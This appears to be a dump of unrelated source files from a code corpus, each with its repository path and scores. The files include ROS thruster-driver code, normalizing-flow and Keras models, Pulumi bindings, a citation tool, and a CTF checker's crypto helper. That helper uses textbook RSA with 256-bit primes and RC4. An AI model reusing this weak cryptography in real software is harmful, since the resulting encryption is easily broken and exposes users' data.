\sigma(\mathbf{W}) &= \max_{\mathbf{h}: \mathbf{h} \ne 0} \dfrac{\|\mathbf{W} \mathbf{h}\|_2}{\|\mathbf{h}\|_2}
    Spectral normalization was introduced to stabilize the training of discriminators
    (critics) in Generative Adversarial Networks (GANs) by rescaling a weight tensor by
    its spectral norm :math:`\sigma`. For a batch normalization layer the affine
    transform is elementwise, so its spectral norm is simply
    :math:`\max_i |w_i / \sqrt{\mathrm{running\_var}_i}|`. This is implemented via a
    hook that computes that value and rescales both ``weight`` and ``bias`` before
    every :meth:`~Module.forward` call, keeping the layer at most ``sigma``-Lipschitz.
See `Spectral Normalization for Generative Adversarial Networks`_ .
.. _`Spectral Normalization for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957
Args:
module (nn.Module): containing module
        name (str, optional): name of weight parameter
        sigma (float, optional): target Lipschitz constant for the layer (default: 1.0)
        eps (float, optional): epsilon for numerical stability in
            calculating norms
Returns:
        The original module with the spectral norm hook
    Example::
        >>> m = bn_spectral_norm(nn.BatchNorm2d(10))
BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
>>> m.weight_orig.size()
torch.Size([10])
"""
BatchNormSpectralNorm.apply(module, name, sigma, eps)
return module
def remove_bn_spectral_norm(module, name='weight'):
r"""Removes the spectral normalization reparameterization from a module.
Args:
module (nn.Module): containing module
name (str, optional): name of weight parameter
Example:
        >>> m = bn_spectral_norm(nn.BatchNorm2d(10))
        >>> remove_bn_spectral_norm(m)
"""
for k, hook in module._forward_pre_hooks.items():
if isinstance(hook, BatchNormSpectralNorm) and hook.name == name:
hook.remove(module)
del module._forward_pre_hooks[k]
return module
raise ValueError("spectral_norm of '{}' not found in {}".format(
name, module))
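if __name__ == "__main__":
    # Minimal sketch (added for illustration, not in the original file): wrap a
    # BatchNorm2d layer and run one training-mode forward pass so the pre-forward
    # hook rescales `weight`/`bias` to keep the layer at most sigma-Lipschitz.
    import torch.nn as nn
    bn = bn_spectral_norm(nn.BatchNorm2d(4), sigma=1.0)
    bn.train()
    _ = bn(torch.randn(8, 4, 16, 16))
    print(bn.weight_orig.shape, bn.weight.shape)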
| 2.625 | 3 |
checkers/kettle/libsimplecrypto.py | SharLike-CTF-Team/altayctf-2019 | 7 | 12796582 | import time
import base64
import binascii
from secrets import token_hex
from rsa import prime
from arc4 import ARC4
def gcd(a, b):
while b != 0:
a, b = b, a % b
return a
def lcm(a, b):
return a * b // gcd(a, b)
def imod(a, n):
    # Brute-force modular inverse: returns c such that (a * c) % n == 1
    # (used below to derive the RSA private exponent d from e and phi).
    i = 1
while True:
c = n * i + 1
if(c % a == 0):
c = c//a
break
i = i+1
return c
def arc4_encrypt(key, message):
arc4 = ARC4(key)
cipher = arc4.encrypt(message)
return cipher
def arc4_decrypt(key, cipher):
arc4 = ARC4(key)
plain = arc4.decrypt(cipher)
return plain
class SimpleRSA:
def __init__(self, bit_length=256):
p, q = 0, 0
while p == q:
p = prime.getprime(bit_length)
q = prime.getprime(bit_length)
self.p = p
self.q = q
self.N = self.p*self.q
self.phi = lcm(self.p - 1, self.q - 1)
self.e = 65537
self.d = imod(self.e, self.phi)
def dump(self):
return (self.p, self.q, self.N, self.phi, self.e, self.d)
def load(self, p, q, N, phi, e, d):
self.p = p
self.q = q
self.N = N
self.phi = phi
self.e = e
self.d = d
def get_pub(self):
return (self.N, self.e)
def get_priv(self):
return (self.N, self.d)
def encrypt(self, m, other_pubkey):
if not isinstance(m, int):
m = int(binascii.hexlify(m.encode()))
return pow(m, other_pubkey[1], other_pubkey[0])
def decrypt(self, c):
res = pow(c, self.d, self.N)
return binascii.unhexlify(str(res))
class Cipher(SimpleRSA):
def __init__(self, params):
self.p = params['p']
self.q = params['q']
self.N = params['N']
self.phi = params['phi']
self.e = params['e']
self.d = params['d']
def decrypt_request(self, tmpkey, message):
k = self.decrypt(tmpkey)
message = arc4_decrypt(k, message)
return message
def encrypt_response(self, user_key, message):
tmpkey = token_hex(nbytes=10)
other_key = (user_key['user_key']['N'], user_key['user_key']['e'])
enc_key = self.encrypt(tmpkey, other_key)
cipher = arc4_encrypt(tmpkey, message)
return dict(
key=enc_key,
data=str(base64.b64encode(cipher))[2:-1]
)
if __name__ == "__main__":
pass | 2.625 | 3 |
src/datastore/persistence_store.py | dgpatelgit/fabric8-analytics-bigquery-manifests-job | 0 | 12796583 | # Copyright © 2020 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: <NAME> <<EMAIL>>
#
"""Implementation persistence store using S3."""
import logging
from rudra.data_store.aws import AmazonS3
from src.config.settings import SETTINGS, AWS_SETTINGS
logger = logging.getLogger(__name__)
class PersistenceStore:
"""Persistence store to save Bigquery Data, it uses AWS S3 as of now as data store."""
def __init__(self, s3_client=None):
"""Initialize DataProcessing object."""
self.s3_client = s3_client
if s3_client:
self.s3_client = s3_client
else:
self.s3_client = AmazonS3(
region_name=AWS_SETTINGS.s3_region,
bucket_name=AWS_SETTINGS.s3_bucket_name,
aws_access_key_id=AWS_SETTINGS.s3_access_key_id,
aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key,
local_dev=not SETTINGS.use_cloud_services
)
def update(self, data, bucket_name, filename='collated.json'):
"""Upload s3 bucket."""
# connect after creating or with existing s3 client
self.s3_client.connect()
if not self.s3_client.is_connected():
raise Exception('Unable to connect to s3.')
json_data = dict()
if self.s3_client.object_exists(filename):
logger.info('%s exists, updating it.', filename)
json_data = self.s3_client.read_json_file(filename)
if not json_data:
raise Exception(f'Unable to get the json data path:{bucket_name}/{filename}')
json_data.update(data)
self.s3_client.write_json_file(filename, json_data)
        logger.info('Updated file successfully!')
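if __name__ == "__main__":
    # Illustrative sketch (not part of the original module): exercise update() with an
    # in-memory stub instead of a real S3 connection. The stub only implements the
    # methods update() calls; real deployments rely on rudra's AmazonS3 client.
    class _StubS3:
        def __init__(self):
            self.files = {"collated.json": {"existing": 1}}
        def connect(self):
            pass
        def is_connected(self):
            return True
        def object_exists(self, name):
            return name in self.files
        def read_json_file(self, name):
            return self.files[name]
        def write_json_file(self, name, data):
            self.files[name] = data
    store = PersistenceStore(s3_client=_StubS3())
    store.update({"new": 2}, bucket_name="demo-bucket")
    print(store.s3_client.files["collated.json"])  # {'existing': 1, 'new': 2}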
| 1.96875 | 2 |
methods/model_n.py | behrouzsh/deepPhosAPI | 0 | 12796584 | <filename>methods/model_n.py
import functools
import itertools
import os
import random
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
from sklearn import metrics
from sklearn import preprocessing
from sklearn.model_selection import train_test_split, KFold, cross_val_score
from keras.layers import Dense, Activation, Flatten, Dropout, Reshape
from keras.layers import Conv1D, Conv2D, MaxPooling2D
from keras.models import Sequential, Model
from keras.utils.np_utils import to_categorical
from keras import optimizers
from keras.optimizers import Adam, SGD
from keras.layers.normalization import BatchNormalization
from keras.regularizers import l2
import copy
def model_net(X_train1, X_train2, X_train3, y_train,
nb_epoch=60,weights=None):
nb_classes = 2
img_dim1 = X_train1.shape[1:]
img_dim2 = X_train2.shape[1:]
img_dim3 = X_train3.shape[1:]
##########parameters#########
init_form = 'RandomUniform'
learning_rate = 0.001
nb_dense_block = 1
nb_layers = 5
nb_filter = 32
growth_rate = 32
# growth_rate = 24
filter_size_block1 = 13
filter_size_block2 = 7
filter_size_block3 = 3
filter_size_ori = 1
dense_number = 32
dropout_rate = 0.2
dropout_dense = 0.3
weight_decay = 0.0001
nb_batch_size = 512
###################
# Construct model #
###################
from methods.phosnet import Phos
model = Phos(nb_classes, nb_layers, img_dim1, img_dim2, img_dim3, init_form, nb_dense_block,
growth_rate, filter_size_block1, filter_size_block2, filter_size_block3,
nb_filter, filter_size_ori,
dense_number, dropout_rate, dropout_dense, weight_decay)
# Model output
# choose optimazation
opt = Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08)
# model compile
model.compile(loss='binary_crossentropy',
optimizer=opt,
metrics=['accuracy'])
# load weights#
if weights is not None:
model.load_weights(weights)
        # model2 = copy.deepcopy(model)
        # NOTE: `model2` aliases `model` (the deepcopy above is commented out), so the
        # layer-wise copy below is effectively a no-op on top of load_weights();
        # behaviour kept exactly as in the original.
        model2 = model
        model2.load_weights(weights)
        for num in range(len(model2.layers) - 1):
            model.layers[num].set_weights(model2.layers[num].get_weights())
if nb_epoch > 0 :
model.fit([X_train1, X_train2, X_train3], y_train, batch_size=nb_batch_size,
# validation_data=([X_val1, X_val2, X_val3, y_val),
# validation_split=0.1,
epochs= nb_epoch, shuffle=True, verbose=1)
return model
| 2.4375 | 2 |
models/MAF.py | mahkons/Dreamer | 0 | 12796585 | import torch
import torch.nn as nn
import torchvision.transforms as T
from .MADE import MADE
from .Shuffle import Shuffle
from .Flow import SequentialConditionalFlow
from .NormFunctions import ActNorm, RunningBatchNorm1d
from utils.logger import log
class MAF(nn.Module):
def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device):
super(MAF, self).__init__()
self.flow_dim = flow_dim
self.condition_dim = condition_dim
self.hidden_dim = hidden_dim
self.device = device
self.model = SequentialConditionalFlow(sum(
[[MADE(flow_dim, condition_dim, hidden_dim, ind == 0),
RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \
for ind in range(num_blocks - 1)] \
+ [[MADE(flow_dim, condition_dim, hidden_dim, False)]],
[]))
self.model.to(device)
self.prior = torch.distributions.Normal(torch.tensor(0., device=device),
torch.tensor(1., device=device))
self.initialized = True
def calc_loss(self, inputs, conditions):
raise NotImplementedError
def forward_flow(self, inputs, conditions):
in_shape = inputs.shape
inputs = inputs.reshape(-1, self.flow_dim)
conditions = conditions.reshape(inputs.shape[0], self.condition_dim)
if not self.initialized and inputs.shape[0] != 1: # hack todo fix?
with torch.no_grad():
self.model.data_init(inputs, conditions)
self.initialized = True
z, logjac = self.model.forward_flow(inputs, conditions)
return z.reshape(in_shape), logjac.reshape(in_shape[:-1])
def sample(self, conditions):
batch_size = conditions.shape[0]
with torch.no_grad():
z = self.prior.sample([batch_size, self.flow_dim])
x, _ = self.model.inverse_flow(z, conditions)
return x
def save(self, path):
torch.save({
"model": self.model.state_dict(),
"optimizer": self.optimizer.state_dict(),
}, path)
def load(self, path):
state_dict = torch.load(path, map_location=self.device)
self.model.load_state_dict(state_dict["model"])
self.optimizer.load_state_dict(state_dict["optimizer"])
"""
Adds uniform noise to dequantize the input image, then applies the logit
transform logit(a + (1 - 2a) * image), as in the MAF paper.
"""
class MAFImageTransform():
def __init__(self, dataset):
if dataset == "mnist":
self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()])
self.alpha = 0.01
else:
raise AttributeError("Unknown dataset")
def __call__(self, image):
image = self.base_transform(image)
noise = (torch.rand_like(image) - 0.5) * (1/256.)
image = (image + noise).clip(0., 1.)
return torch.logit(self.alpha + (1 - 2 * self.alpha) * image)
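if __name__ == "__main__":
    # Minimal sketch (not part of the original module): build a small MAF on CPU and
    # push a random batch through the forward flow. The dimensions are arbitrary
    # assumptions for the demo; the flow sub-modules come from this package.
    device = torch.device("cpu")
    maf = MAF(flow_dim=4, condition_dim=3, hidden_dim=16, num_blocks=2, device=device)
    z, logjac = maf.forward_flow(torch.randn(8, 4), torch.randn(8, 3))
    print(z.shape, logjac.shape)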
| 2.03125 | 2 |
sdk/python/pulumi_okta/profile/_inputs.py | brinnehlops/pulumi-okta | 0 | 12796586 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from .. import _utilities, _tables
__all__ = [
'MappingMappingArgs',
]
@pulumi.input_type
class MappingMappingArgs:
def __init__(__self__, *,
expression: pulumi.Input[str],
id: pulumi.Input[str],
push_status: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "expression", expression)
pulumi.set(__self__, "id", id)
if push_status is not None:
pulumi.set(__self__, "push_status", push_status)
@property
@pulumi.getter
def expression(self) -> pulumi.Input[str]:
return pulumi.get(self, "expression")
@expression.setter
def expression(self, value: pulumi.Input[str]):
pulumi.set(self, "expression", value)
@property
@pulumi.getter
def id(self) -> pulumi.Input[str]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: pulumi.Input[str]):
pulumi.set(self, "id", value)
@property
@pulumi.getter(name="pushStatus")
def push_status(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "push_status")
@push_status.setter
def push_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "push_status", value)
| 1.992188 | 2 |
deprecated/drivers/sub8_videoray_m5_thruster/nodes/thruster_driver.py | ericgorday/SubjuGator | 27 | 12796587 | #!/usr/bin/env python
import numpy as np
import copy
import rospy
import rospkg
import rosparam
import threading
import argparse
from geometry_msgs.msg import Vector3
from std_msgs.msg import Header, Float64
from sub8_msgs.msg import Thrust, ThrusterStatus
from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point
from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster
from sub8_thruster_comm import thruster_comm_factory
from ros_alarms import AlarmBroadcaster, AlarmListener
lock = threading.Lock()
class BusVoltageMonitor(object):
'''
Class that estimates sub8's thruster bus voltage.
    As of May 2017, this is just a simple rolling average over a constant-width sliding
    window. However, the add_reading and get_voltage_estimate methods are kept separate
    for when smarter filtering is needed.
'''
VMAX = 50 # volts
VMIN = 0 # volts
class VoltageReading(object):
def __init__(self, voltage, time):
self.v = voltage
self.t = time
def __init__(self, window_duration):
'''
window_duration - float (amount of seconds for which to keep a reading in the buffer)
'''
self.bus_voltage_alarm = AlarmBroadcaster("bus-voltage")
self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1)
self.warn_voltage = rospy.get_param("/battery/warn_voltage", 44.5)
self.kill_voltage = rospy.get_param("/battery/kill_voltage", 44.0)
self.last_estimate_time = rospy.Time.now()
self.WINDOW_DURATION = rospy.Duration(window_duration)
self.ESTIMATION_PERIOD = rospy.Duration(0.2)
self.cached_severity = 0
self.buffer = []
def add_reading(self, voltage, time):
''' Adds voltage readings to buffer '''
voltage = float(voltage)
# Only add if it makes sense (the M5's will give nonsense feedback at times)
if voltage >= self.VMIN and voltage <= self.VMAX:
self.buffer.append(self.VoltageReading(voltage, time))
self.prune_buffer()
# check bus voltage if enough time has passed
if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD:
self.check_bus_voltage()
def prune_buffer(self):
''' Removes readings older than the window_duration from buffer '''
for reading in self.buffer:
age = rospy.Time.now() - reading.t
if age > self.WINDOW_DURATION:
self.buffer.remove(reading)
def get_voltage_estimate(self):
''' Returns average voltage in buffer '''
voltages = []
if len(self.buffer) == 0:
return None
for r in self.buffer:
voltages.append(r.v)
return np.mean(voltages)
def check_bus_voltage(self):
''' Publishes bus_voltage estimate and raises alarm if necessary '''
bus_voltage = self.get_voltage_estimate()
if bus_voltage is None:
return
self.bus_voltage_pub.publish(Float64(bus_voltage))
severity = None
if bus_voltage < self.warn_voltage:
severity = 3
if bus_voltage < self.kill_voltage:
severity = 5
if severity is not None and self.cached_severity != severity:
self.bus_voltage_alarm.raise_alarm(
problem_description='Bus voltage has fallen to {}'.format(bus_voltage),
parameters={'bus_voltage': bus_voltage},
severity=severity
)
self.cached_severity = severity
class ThrusterDriver(object):
_dropped_timeout = 1.0 # s
_window_duration = 30.0 # s
_NODE_NAME = rospy.get_name()
def __init__(self, ports_layout, thruster_definitions):
'''Thruster driver, an object for commanding all of the sub's thrusters
- Gather configuration data and make it available to other nodes
- Instantiate ThrusterPorts, (Either simulated or real), for communicating with thrusters
- Track a thrust_dict, which maps thruster names to the appropriate port
- Given a command message, route that command to the appropriate port/thruster
- Send a thruster status message describing the status of the particular thruster
'''
self.failed_thrusters = set() # This is only determined by comms
self.deactivated_thrusters = set() # These will not come back online even if comms are good (user managed)
# Alarms
self.thruster_out_alarm = AlarmBroadcaster("thruster-out")
AlarmListener("thruster-out", self.check_alarm_status, call_when_raised=False) # Prevent outside interference
# Create ThrusterPort objects in a dict indexed by port name
self.load_thruster_ports(ports_layout, thruster_definitions)
# Feedback on thrusters (thruster mapper blocks until it can use this service)
self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info)
self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10)
for name in self.thruster_to_port_map.keys()}
# These alarms require this service to be available before things will work
rospy.wait_for_service("update_thruster_layout")
self.update_thruster_out_alarm()
# Bus voltage
self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration)
# Command thrusters
self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1)
# To programmatically deactivate thrusters
self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster)
self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster)
@thread_lock(lock)
def load_thruster_ports(self, ports_layout, thruster_definitions):
''' Loads a dictionary ThrusterPort objects '''
self.ports = {} # ThrusterPort objects
self.thruster_to_port_map = {} # node_id to ThrusterPort
rospack = rospkg.RosPack()
self.make_fake = rospy.get_param('simulate', False)
if self.make_fake:
rospy.logwarn("Running fake thrusters for simulation, based on parameter '/simulate'")
# Instantiate thruster comms port
for port_info in ports_layout:
port_name = port_info['port']
self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake)
# Add the thrusters to the thruster dict and configure if present
for thruster_name in port_info['thruster_names']:
self.thruster_to_port_map[thruster_name] = port_info['port']
if thruster_name not in self.ports[port_name].online_thruster_names:
rospy.logerr("ThrusterDriver: {} IS MISSING!".format(thruster_name))
else:
rospy.loginfo("ThrusterDriver: {} registered".format(thruster_name))
# Set firmware settings
port = self.ports[port_name]
node_id = thruster_definitions[thruster_name]['node_id']
config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' +
thruster_name + '.yaml')
rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name,
config_path))
port.set_registers_from_dict(node_id=node_id,
reg_dict=rosparam.load_file(config_path)[0][0])
port.reboot_thruster(node_id) # Necessary for some settings to take effect
def get_thruster_info(self, srv):
''' Get the thruster info for a particular thruster name '''
query_name = srv.thruster_name
info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name]
thruster_info = ThrusterInfoResponse(
node_id=info.node_id,
min_force=info.thrust_bounds[0],
max_force=info.thrust_bounds[1],
position=numpy_to_point(info.position),
direction=Vector3(*info.direction)
)
return thruster_info
def check_alarm_status(self, alarm):
# If someone else cleared this alarm, we need to make sure to raise it again
if not alarm.raised and alarm.node_name != self._NODE_NAME:
self.update_thruster_out_alarm()
def update_thruster_out_alarm(self):
'''
Raises or clears the thruster out alarm
Updates the 'offline_thruster_names' parameter accordingly
Sets the severity to the number of failed thrusters (clipped at 5)
'''
offline_names = list(self.failed_thrusters)
if len(self.failed_thrusters) > 0:
self.thruster_out_alarm.raise_alarm(
node_name=self._NODE_NAME,
parameters={'offline_thruster_names': offline_names},
severity=int(np.clip(len(self.failed_thrusters), 1, 5)))
else:
self.thruster_out_alarm.clear_alarm(
node_name=self._NODE_NAME,
parameters={'offline_thruster_names': offline_names})
@thread_lock(lock)
def command_thruster(self, name, thrust):
'''
Issue a a force command (in Newtons) to a named thruster
Example names are BLR, FLH, etc.
Raises RuntimeError if a thrust value outside of the configured thrust bounds is commanded
Raises UnavailableThrusterException if a thruster that is offline is commanded a non-zero thrust
'''
port_name = self.thruster_to_port_map[name]
target_port = self.ports[port_name]
thruster_model = target_port.thruster_info[name]
if thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]:
rospy.logwarn('Tried to command thrust ({}) outside of physical thrust bounds ({})'.format(
thrust, thruster_model.thrust_bounds))
if name in self.failed_thrusters:
if not np.isclose(thrust, 0):
rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster (' + name + ')')
effort = target_port.thruster_info[name].get_effort_from_thrust(thrust)
# We immediately get thruster_status back
thruster_status = target_port.command_thruster(name, effort)
# Keep track of thrusters going online or offline
offline_on_port = target_port.get_offline_thruster_names()
for offline in offline_on_port:
if offline not in self.failed_thrusters:
self.failed_thrusters.add(offline) # Thruster went offline
for failed in copy.deepcopy(self.failed_thrusters):
if (failed in target_port.get_declared_thruster_names() and
failed not in offline_on_port and
failed not in self.deactivated_thrusters):
self.failed_thrusters.remove(failed) # Thruster came online
# Don't try to do anything if the thruster status is bad
if thruster_status is None:
return
message_contents = [
'rpm',
'bus_v',
'bus_i',
'temp',
'fault',
'command_tx_count',
'status_rx_count',
'command_latency_avg'
]
message_keyword_args = {key: thruster_status[key] for key in message_contents}
power = thruster_status['bus_v'] * thruster_status['bus_i']
self.status_publishers[name].publish(
ThrusterStatus(
header=Header(stamp=rospy.Time.now()),
name=name,
node_id=thruster_model.node_id,
power=power,
effort=effort,
thrust=thrust,
**message_keyword_args
)
)
# Will publish bus_voltage and raise alarm if necessary
self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now())
# Undervolt/overvolt faults are unreliable (might not still be true - David)
if message_keyword_args['fault'] > 2:
fault_codes = {
(1 << 0): 'UNDERVOLT',
(1 << 1): 'OVERRVOLT',
(1 << 2): 'OVERCURRENT',
(1 << 3): 'OVERTEMP',
(1 << 4): 'STALL',
(1 << 5): 'STALL_WARN',
}
fault = int(message_keyword_args['fault'])
faults = []
for code, fault_name in fault_codes.items():
if code & fault != 0:
faults.append(fault_name)
rospy.logwarn("Thruster: {} has entered fault with status {}".format(name, message_keyword_args))
rospy.logwarn("Fault causes are: {}".format(faults))
return
def thrust_cb(self, msg):
'''
Callback for receiving thrust commands
These messages contain a list of instructions, one for each thruster
If there are any updates to the list of failed thrusters, it will raise and alarm
'''
failed_before = {x for x in self.failed_thrusters}
for thrust_cmd in list(msg.thruster_commands):
self.command_thruster(thrust_cmd.name, thrust_cmd.thrust)
# Raise or clear 'thruster-out' alarm
if not self.failed_thrusters == failed_before:
rospy.logdebug('Failed thrusters:', self.failed_thrusters)
self.update_thruster_out_alarm()
def stop(self):
''' Commands 0 thrust to all thrusters '''
for port in self.ports.values():
for thruster_name in port.online_thruster_names.copy():
self.command_thruster(thruster_name, 0.0)
def fail_thruster(self, srv):
''' Makes a thruster unavailable for thrust allocation '''
# So that thrust is not allocated to the thruster
self.failed_thrusters.add(srv.thruster_name)
# So that it won't come back online even if comms are good
self.deactivated_thrusters.add(srv.thruster_name)
# So that thruster_mapper updates the B-matrix
self.update_thruster_out_alarm()
return {}
def unfail_thruster(self, srv):
''' Undoes effect of self.fail_thruster '''
self.failed_thrusters.remove(srv.thruster_name)
self.deactivated_thrusters.remove(srv.thruster_name)
self.update_thruster_out_alarm()
return {}
if __name__ == '__main__':
PKG = 'sub8_videoray_m5_thruster'
usage_msg = "Interface to Sub8's VideoRay M5 thrusters"
desc_msg = "Specify a path to the configuration.json file containing the thrust calibration data"
parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg)
args = parser.parse_args(rospy.myargv()[1:])
rospy.init_node('videoray_m5_thruster_driver')
layout_parameter = '/thruster_layout'
rospy.loginfo("Thruster Driver waiting for parameter, {}".format(layout_parameter))
thruster_layout = wait_for_param(layout_parameter)
if thruster_layout is None:
raise IOError('/thruster_layout rosparam needs to be set before launching the thruster driver')
thruster_driver = ThrusterDriver(thruster_layout['thruster_ports'], thruster_layout['thrusters'])
rospy.spin()
| 2.515625 | 3 |
scripts/bib4txt.py | cpitclaudel/bibstuff | 9 | 12796588 | <filename>scripts/bib4txt.py
#!/usr/bin/env python
# bib4txt.py
"""
Creates formatted references for a text document.
Uuseful for reStructuredText documents.
Interacts with a Bibtex-style database file
(without using LaTeX or bibtex).
Dependencies:
- Python 2.4 or higher
- SimpleParse (binaries available!)
- BibStuff (which you should have if you have this)
The source text file should include citation references in reStructuredText format:
http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations
Roughly: a citation key enclosed in brackets, followed by an underscore.
Citation keys cannot be all digits.
The source document can be output with formatted citation references substituted for the citation keys.
In this case, the reference list is added to the end of the file.
A slight modification of the reStructuredText ``cite`` directive is currently allowed:
- Most characters are permitted.
E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal in reST and will be recognized by bib4txt.
- Comma separted multiple keys are permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_``
This is *not* legal reST.
The intent is for the formatted references to be written to a separate file.
You can then include this in your reST document with an ``include`` directive.
How it works:
- Uses SimpleParse_ to convert an EBNF_ grammar into an object for scanning reST files for citation references.
- Uses SimpleParse_ to convert an EBNF_ grammar into an object for scanning .bib files. (See Bibstuff's bibgrammar.py.)
- Extracts the citation references from the input document.
- Outputs a sorted list of citation definitions, to be used in the References section of your documents.
:author: <NAME>
:date: 2006-07-27
:contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm
:copyright: 2006 by <NAME>
:license: MIT (see `license.txt`_)
:note: now allows multiple database (.bib) files
:note: bib4txt supercedes addrefs.py, by <NAME>
:note: Python 2.4 dependencies: sets, sorted
:note: Python 2.6 dependencies: with
:TODO: address the TODOs in the associate BibStuff files, especially in bibstyles/shared.py
.. _EBNF: http://www.garshol.priv.no/download/text/bnf.html
.. _SimpleParse: http://simpleparse.sourceforge.net/
.. _`license.txt`: ../license.txt
"""
__docformat__ = "restructuredtext en"
__version__ = "1.1.4"
__needs__ = '2.7+'
################### IMPORTS ##################################################
#import from standard library
import importlib, os, sys
import logging
logging.basicConfig(format='\n%(levelname)s:\n%(message)s\n')
bib4txt_logger = logging.getLogger('bibstuff_logger')
#import dependencies
import simpleparse
#local imports
try:
from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp
except ImportError: #hack to allow user to run without installing
scriptdir = os.path.dirname(os.path.realpath(__file__))
bibdir = os.path.dirname(scriptdir)
sys.path.insert(0, bibdir)
from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp
################################################################################
################### GLOBALS ##################################################
# some globals are set when this file is run as a script
# style
# bibfile_processor
# note that the standard separator for multiple keys in one citation reference is a comma
# CITATION_SEP = ','
# set in styles/shared.py
def make_text_output(src_as_string,
src_parser,
parsed_bibfile,
style, # imported style module
citations_only=True):
"""Create intext citations and the bibliography"""
#first: create a citation manager to handle the bibfile(s)
bib4txt_logger.debug('create citation manager')
citation_manager = style.CitationManager([parsed_bibfile],
citekeys=None,
citation_template=style.CITATION_TEMPLATE)
#second: create CiteRefProcessor object to process cites during src parsing
# (and associate it with the citation_manager)
bib4txt_logger.debug('create cite processor')
cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager)
#third: parse the text (ignore `taglist`; it is a dummy container)
bib4txt_logger.info('fill cite processor with keys')
taglist = src_parser.parse(src_as_string, processor=cite_processor)
"""
:note: Now cite_processor.all_citekeys holds the cite keys.
It is also associated with citation_manager which holds the bibliography,
so we can make a sorted entry list. To do so need:
- the keys for the citations referenced
- a sort-key on which to base the sorting
:note: Sorting is style dependent---e.g., might sort entries on citation_rank.
"""
#set the citation manager citekeys to all found keys (an ordered list)
#citation_manager.citekeys = cite_processor.all_citekeys
#make the citation definitions for a list of References
bib4txt_logger.info('make citations')
result = citation_manager.make_citations()
#lastly, prepend the entire document, if desired
if not citations_only:
result = cite_processor.__repr__() + result
return result+'\n' # ds added newline 2008-06-27
################################################################################
def bibfiles2string(bibfile_names):
bibfiles_as_strings = list()
for bibfile_name in bibfile_names:
if (os.path.splitext(bibfile_name)[-1]).lower() != ".bib":
bib4txt_logger.warning("%s does not appear to be a .bib file."%bibfile_name )
try:
with open(bibfile_name,'r') as fh:
bibfiles_as_strings.append( fh.read() )
except IOError:
bib4txt_logger.warning("%s not found."%bibfile_name )
return '\n'.join( bibfiles_as_strings )
def main():
"""Command-line tool. See bib4txt.py -h for help.
"""
#set default input and output
_infile = sys.stdin
_outfile = sys.stdout
from argparse import ArgumentParser
_usage = """
usage: %(prog)s [options] BIB_DATABASE
standard usage: %(prog)s -i reST_FILE -n -o refs_FILE BIB_DATABASE
"""
parser = ArgumentParser(usage=_usage)
parser.add_argument('--version', action='version', version=__version__)
parser.add_argument("-i", "--infile", action="store", dest="infile",
help="Parse FILE for citation references.", metavar="FILE")
parser.add_argument("-o", "--outfile", action="store", dest="outfile",
help="Write formatted references to FILE", metavar="FILE")
parser.add_argument("-n", "--nuke", action="store_true", dest="overwrite", default=False,
help="silently overwrite outfile, default=%(default)s")
parser.add_argument("-F", "--stylefile", action="store",
dest="stylefile", default="default.py",
help="Specify user-chosen style file",metavar="FILE")
parser.add_argument("-s", "--style", action="store",
dest="style", default="default",
help="Specify user-chosen style (by style name).")
#parser.add_argument("-v", "--verbose", action="store_true", dest="verbose", default=False, help="Print INFO messages to stdout, default=%(default)s")
parser.add_argument("-V", "--verbosity", action="store", type=int, dest="verbosity", default=0,
help="2: print DEBUG messages; 1: print INFO messages; default=%(default)s")
parser.add_argument("-a", "--all", action="store_true", dest="entire_doc", default=False,
help="Output entire document, making citation reference substitutions, default=%(default)s")
parser.add_argument("-x", "--xp", action="store_true", dest="xp_parse",
default=False, help="Use experimental document parser, default=%(default)s")
parser.add_argument("-L", "--logger-level", action="store", type=int, dest="logger_level",
